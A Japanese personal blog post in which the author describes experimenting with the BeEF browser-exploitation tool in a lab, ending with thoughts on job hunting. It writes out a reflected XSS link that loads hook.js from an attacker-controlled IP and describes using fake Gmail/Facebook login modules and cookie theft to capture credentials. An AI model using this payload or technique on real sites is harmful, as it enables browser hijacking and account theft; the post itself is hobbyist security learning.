なんかアセンブリとかflaskとか色々やろうとしてたけど
今日最終的に行き着いたのがBeef
Kali Linux「Beef」とは
アクセスしてきたユーザに対してさまざまなスクリプトの実行を可能とするツール
重要となるのがhook.js
例えば脆弱なサイトを標的としたリンクを作成する
hxxp://www.akkieworld.com/xss/xss_confirm.php?name=&url=%3Cscript+src%3Dhttp%3A%2F%2F192.168.179.44%3A3000%2Fhook.js%3E%3C%2Fscript%3E
urlのパラメータとしては下記のスクリプトが入っている
<script src=hxxp://192.168.179.44:3000/hook.js></script>
上記のリンクを踏んでしまうと、srcに入っているスクリプトが実行される
そしてhook.jsは、アクセスしてきたユーザのブラウザをゾンビ化させるスクリプト
(と、認識しているつもり...)
hook.jsを通じて攻撃側(192.168.179.44)は
様々なスクリプトをユーザ側のブラウザで実行できるようになる
kali linux本でも紹介されてたのが、入力フォームを表示させて
メールアドレスとパスワードの入力を促すスクリプト
Gmailとかfacebookとかリアルに見える入力フォームが使われていた
Social Engineeringのフォルダに入っている
・Pretty Theft
とかがそう
どちらか選んでExecuteすると
スクリプト実行中のユーザのブラウザ上に入力フォームが出たりする
そして入力された情報は攻撃者側のBeefのツール上で確認することができる
これでアカウント情報の窃取が完了するわけだ
ソーシャルエンジニアリング系以外にもたくさんモジュールが用意されてるけど
いまいち使い方がわからないものばかり
あと、このhook.jsはユーザが別のページに飛んでしまうと効かなくなる
だから有効な間にcookieとるとか入力フォーム出して情報盗むとか
そんな使い方が妥当なのか
まぁ久しぶりにkali linuxのツールで遊べたから良かったな
余談:
転職サイト見てたけど、自分の持ってるセキュリティスキルとはって
考えた時に自信を持って答えられそうなものが一つもなかった
なんというか、全部満遍なく触れるようにしてきたつもりやったけど、
あまりに全部が「触れてみた」レベル止まりで
これは誰よりもできるっていうのがないことに気がついた
でも気がつけてよかった、何か絞るとするか
